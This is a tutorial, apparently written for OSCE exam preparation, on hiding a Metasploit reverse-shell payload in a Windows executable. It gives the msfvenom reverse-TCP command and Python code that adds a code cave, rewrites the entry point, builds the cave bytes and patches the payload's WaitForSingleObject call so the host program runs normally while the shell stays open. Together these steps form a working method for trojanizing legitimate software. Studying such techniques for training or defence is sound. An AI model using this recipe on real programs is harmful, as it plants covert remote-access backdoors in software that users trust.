Looking for WaitForSingleObject Call in Modern Metasploit Shellcode

May 2017

This article describes how to locate the WaitForSingleObject call in shellcode generated by Metasploit. If you are doing OSCE, you may have run into this function when using shellcode generated by msfvenom.

Step 1: Generating payload

First, we generate the shellcode with msfvenom. We set EXITFUNC=none so that our program keeps running after the shellcode completes.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=none -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of hex file: 648 bytes

I spent a couple of hours trying to figure out why the windows/exec payload does not work here. The reason is that it generates a payload laid out as shellcode + cmd_string, so when the shellcode finishes, execution runs straight into cmd_string.

Step 2: Preparing executable

Add a new section to the executable with the following attributes: Name: .NewSec, VOffset: 0x46000, VSize: 0x1000, ROffset: 0x2D000, RSize: 0x1000, Flags: 0xE00000E0.
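The flags are a 32-bit bitmask, so it helps to see which bits are set. The following is a minimal sketch that breaks 0xE00000E0 into the section characteristic constants defined by the PE format. The helper name describe_flags is made up for illustration.

```python
# Section characteristic bits from the PE/COFF format (names as in winnt.h).
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def describe_flags(value):
    """Return the names of the known bits set in a Characteristics value."""
    return [name for bit, name in sorted(SECTION_FLAGS.items()) if value & bit]


if __name__ == "__main__":
    for name in describe_flags(0xE00000E0):
        print(name)
```

The section has to be executable because the code cave runs from it. Write access is presumably included so that the section can also hold data modified at run time.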

If you are doing CTP/OSCE, you are familiar with overwriting the first instructions of a program, the ones located at the Original Entry Point, so that they jump to your own code. You could do that here. Alternatively, you can overwrite the AddressOfEntryPoint field in the PE header.
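For the second option, here is a rough sketch of where the AddressOfEntryPoint field sits in the file. It relies on the standard PE layout: the DWORD at offset 0x3C points to the PE signature, which is followed by a 20-byte file header and then the optional header, where AddressOfEntryPoint is at offset 16. The function names are made up for illustration, and the sketch does no validation beyond the two signatures.

```python
import struct


def entry_point_field_offset(pe_bytes):
    """Return the file offset of the AddressOfEntryPoint field."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # 4-byte signature + 20-byte file header + 16 bytes into the optional header
    return e_lfanew + 4 + 20 + 16


def get_entry_point(pe_bytes):
    """Read the entry point RVA."""
    offset = entry_point_field_offset(pe_bytes)
    return struct.unpack_from("<I", pe_bytes, offset)[0]


def set_entry_point(pe_bytes, new_rva):
    """Return a copy of the image with the entry point RVA replaced."""
    patched = bytearray(pe_bytes)
    struct.pack_into("<I", patched, entry_point_field_offset(pe_bytes), new_rva)
    return bytes(patched)
```

With the section from above, set_entry_point(data, 0x46000) would point the entry point at the start of .NewSec. The value is an RVA, not a file offset. Remember the old value, because the code cave has to jump back to it.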

Then you create a code cave like this:

  1. pushad
  2. pushfd
  3. msfvenom generated payload
  4. stack alignment via sub esp, ... or add esp, ...
  5. popfd
  6. popad
  7. return to the original flow (depends on the way you hijacked the original flow)
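The layout above can be sketched as a small byte builder. This is only an illustration under several assumptions: the stack is fixed with add esp, imm32 (a negative value acts as sub esp), the return is a near jmp rel32, and any instructions overwritten at the hijack point are replayed elsewhere. The function name build_cave and all addresses and the stack adjustment in the usage lines are hypothetical. The right adjustment has to be measured in a debugger.

```python
import struct

PUSHAD, PUSHFD, POPFD, POPAD = b"\x60", b"\x9c", b"\x9d", b"\x61"


def build_cave(payload, cave_va, return_va, stack_fix):
    """Assemble pushad, pushfd, payload, add esp, popfd, popad, jmp."""
    body = PUSHAD + PUSHFD + payload
    body += b"\x81\xc4" + struct.pack("<i", stack_fix)  # add esp, imm32
    body += POPFD + POPAD
    jmp_va = cave_va + len(body)          # address of the jmp instruction
    rel32 = return_va - (jmp_va + 5)      # relative to the end of the jmp
    return body + b"\xe9" + struct.pack("<i", rel32)


if __name__ == "__main__":
    # Hypothetical values: a 4-byte stand-in payload, cave at 0x446000,
    # return address 0x401005, and a stack adjustment of 0x200 bytes.
    cave = build_cave(b"\x90" * 4, 0x446000, 0x401005, 0x200)
    print(cave.hex())
```

The jump displacement is computed from the end of the 5-byte jmp instruction, which is why the cave's own virtual address is needed.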

Step 3: Understanding Metasploit shellcode

We do not need to reverse the whole shellcode. The git repository of Metasploit has assembly source code for all payloads.

The file block_api.asm defines a function that looks up API functions. Shellcode generated by msfvenom identifies API functions by their hashes, not by names or addresses. As a result, it contains no readable function names or direct pointers, which makes it harder to reverse engineer.

The following Python code calculates a function hash:

# -*- coding: utf-8 -*-

def ror(dword, bits):
    # Rotate a 32-bit value right by the given number of bits.
    return (dword >> bits | dword << 32 - bits) & 0xFFFFFFFF

def unicode(string, uppercase=True):
    # Mimic a UTF-16LE module name: each character is followed by a null byte.
    result = ''
    if uppercase:
        string = string.upper()
    for c in string:
        result += c + '\x00'
    return result

def hash(module, function, bits=13, print_hash=True):
    # block_api.asm rotates by 13 bits, hence the default.
    module_hash = 0
    function_hash = 0
    for c in unicode(module + '\x00'):
        module_hash = ror(module_hash, bits)
        module_hash += ord(c)
    for c in str(function + '\x00'):
        function_hash = ror(function_hash, bits)
        function_hash += ord(c)
    h = module_hash + function_hash & 0xFFFFFFFF
    if print_hash:
        print('[+] 0x%08X = %s!%s' % (h, module.lower(), function))
    return h

if __name__ == '__main__':
    hash('kernel32.dll', 'WaitForSingleObject')

When we run it, it will display the hash of the WaitForSingleObject function in the kernel32.dll module.

python hash.py
[+] 0x601D8708 = kernel32.dll!WaitForSingleObject

The hash is 0x601D8708.

Then, to get a reverse shell, the shellcode uses the code from block_reverse_tcp.asm. This code looks up the required API functions by their hashes (those push; call ebp; instruction pairs), calls them, and then returns a socket in the edi register. A call to connect, for example, looks like this:

push byte 16        ; length of the sockaddr struct
push esi            ; pointer to the sockaddr struct
push edi            ; the socket
push 0x6174A599     ; hash( "ws2_32.dll", "connect" )
call ebp            ; connect( s, &sockaddr, 16 );
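When reading a disassembly, the reverse direction is often more useful: given a constant pushed before call ebp, find out which function it stands for. A minimal sketch, assuming you can guess a list of candidate functions. It hashes each candidate and builds a lookup table. The names api_hash and build_lookup are made up here, and the candidate list only holds the two functions mentioned in this article.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def api_hash(module, function, bits=13):
    """Hash a module/function pair the way block_api.asm does."""
    # Module name: uppercased, UTF-16LE, including the null terminator.
    module_bytes = (module.upper() + "\x00").encode("utf-16-le")
    # Function name: ASCII, including the null terminator.
    function_bytes = (function + "\x00").encode("ascii")
    module_hash = 0
    for b in bytearray(module_bytes):
        module_hash = (ror32(module_hash, bits) + b) & 0xFFFFFFFF
    function_hash = 0
    for b in bytearray(function_bytes):
        function_hash = (ror32(function_hash, bits) + b) & 0xFFFFFFFF
    return (module_hash + function_hash) & 0xFFFFFFFF


def build_lookup(candidates):
    """Map hash values back to 'module!function' strings."""
    return {api_hash(m, f): "%s!%s" % (m, f) for m, f in candidates}


CANDIDATES = [
    ("ws2_32.dll", "connect"),
    ("kernel32.dll", "WaitForSingleObject"),
]

if __name__ == "__main__":
    table = build_lookup(CANDIDATES)
    for value in (0x6174A599, 0x601D8708):
        print("0x%08X -> %s" % (value, table.get(value, "unknown")))
```

Extending CANDIDATES with the exports of kernel32.dll and ws2_32.dll would cover most constants seen in the payloads discussed here.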

After that, the shellcode spawns a shell using block_shell.asm. This code calls CreateProcessA and uses our socket as stdin, stdout, and stderr.

Finally, the code in block_exitfunk.asm calls an exit function (the one specified via the EXITFUNC parameter).

Step 4: Fixing shellcode

If we look closely at the block_shell.asm code, we’ll see that it calls the WaitForSingleObject function. This snippet shows where it is used:

dec esi             ; decrement ESI down to -1 (INFINITE)
push esi            ; push INFINITE in order to wait forever
inc esi             ; increment ESI back to zero
push dword [eax]    ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708     ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp            ; WaitForSingleObject( pi.hProcess, INFINITE );
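To find this call in the generated payload without stepping through it, you can search the bytes for the hash. A minimal sketch, assuming the payload encodes the call as push imm32 (opcode 68, hash in little-endian order) followed by call ebp (FF D5), as in the snippet above. The function names are made up for illustration.

```python
import struct

WAIT_HASH = 0x601D8708  # kernel32.dll!WaitForSingleObject


def load_hex(text):
    """Convert the output of `msfvenom -f hex` to bytes."""
    return bytes.fromhex("".join(text.split()))


def find_api_calls(shellcode, api_hash):
    """Return the offsets of every `push <hash>; call ebp` sequence."""
    needle = b"\x68" + struct.pack("<I", api_hash) + b"\xff\xd5"
    offsets = []
    pos = shellcode.find(needle)
    while pos >= 0:
        offsets.append(pos)
        pos = shellcode.find(needle, pos + 1)
    return offsets


if __name__ == "__main__":
    # Bytes of the six instructions shown above, used as a stand-in payload.
    fragment = load_hex("4e 56 46 ff 30 68 08 87 1d 60 ff d5")
    for offset in find_api_calls(fragment, WAIT_HASH):
        print("push/call found at offset 0x%X" % offset)
```

On a real payload, pass the hex string printed by msfvenom to load_hex. The dec esi to patch sits five bytes before the reported offset if the payload matches block_shell.asm.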

We see this code uses INFINITE as a value for the dwMilliseconds parameter. The prototype of the WaitForSingleObject function is:

DWORD WINAPI WaitForSingleObject( _In_ HANDLE hHandle, _In_ DWORD dwMilliseconds);

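With INFINITE, the call blocks until the spawned shell exits, so the host program freezes in the meantime. To avoid that, we must set dwMilliseconds to zero, which makes the call return immediately. Because dec esi and nop are both one byte long, we can do that by changing dec esi to nop.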
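The same one-byte change can be applied to the raw payload before it is pasted into the code cave. A minimal sketch, assuming the generated payload contains exactly the instruction sequence from block_shell.asm shown above (4E is dec esi, 90 is nop). The function name patch_wait_timeout is made up for illustration.

```python
import struct

# dec esi; push esi; inc esi; push dword [eax]; push 0x601D8708; call ebp
WAIT_SEQUENCE = (
    b"\x4e\x56\x46\xff\x30\x68" + struct.pack("<I", 0x601D8708) + b"\xff\xd5"
)


def patch_wait_timeout(shellcode):
    """Replace the `dec esi` before the WaitForSingleObject call with `nop`."""
    pos = shellcode.find(WAIT_SEQUENCE)
    if pos < 0:
        raise ValueError("WaitForSingleObject sequence not found")
    if shellcode.find(WAIT_SEQUENCE, pos + 1) >= 0:
        raise ValueError("sequence is not unique, patch by hand")
    patched = bytearray(shellcode)
    patched[pos] = 0x90  # nop, so ESI stays 0 and the timeout becomes zero
    return bytes(patched)


if __name__ == "__main__":
    # Stand-in payload: filler bytes around the sequence.
    sample = b"\xcc" * 3 + WAIT_SEQUENCE + b"\xcc"
    print(patch_wait_timeout(sample).hex())
```

Matching the whole sequence rather than a lone 4E byte avoids patching an unrelated dec esi elsewhere in the payload.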

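Now the relevant part of our shellcode should look like this:

nop                 ; was dec esi, so ESI stays at zero
push esi            ; push 0 as dwMilliseconds, so the call returns immediately
inc esi             ; ESI is now 1 instead of 0
push dword [eax]    ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708     ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp            ; WaitForSingleObject( pi.hProcess, 0 );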

Copy changes to the executable, save it, and run it. Everything should work fine.